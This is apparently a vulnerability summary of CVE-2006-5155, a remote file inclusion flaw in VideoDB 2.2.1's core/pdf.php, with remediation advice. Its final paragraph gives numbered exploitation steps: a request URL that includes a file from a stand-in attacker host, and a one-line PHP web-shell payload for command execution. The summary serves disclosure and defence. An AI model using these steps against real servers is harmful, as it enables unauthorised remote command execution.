CVE-2006-5155

An attacker sends an HTTP request to `core/pdf.php` with the `config[pdf_module]` parameter set to a URL pointing to a remote PHP shell. The script passes this user-supplied value directly into a `define()` call and then uses it in a `require_once` statement, causing PHP to include and execute the attacker's remote file. No authentication is required, and the only precondition is that the target server has `allow_url_include` enabled in PHP configuration [ref_id=1].

The vulnerable file is `core/pdf.php` in VideoDB 2.2.1 and earlier. The exploit write-up [ref_id=1] shows the code defines `FPDF` using the unsanitized `$config['pdf_module']` value, then calls `require_once FPDF.'/fpdf.php'`, allowing an attacker to control the included file path.

No official patch is included in the bundle. The advisory [ref_id=1] does not describe a fix. To remediate, the application should validate that `$config['pdf_module']` is a local path within an expected directory, rather than accepting an arbitrary URL or filesystem path. Disabling `allow_url_include` in PHP configuration would also block this specific remote file inclusion vector.

1. Identify a target running VideoDB 2.2.1 or earlier. 2. Send a request to `http://target/path/core/pdf.php?config[pdf_module]=http://attacker.com/shell.txt?` where `shell.txt` contains PHP code (e.g., `<?php passthru($_GET['cmd']);?>`). 3. The server will include and execute the remote file, allowing command execution via the `cmd` parameter [ref_id=1].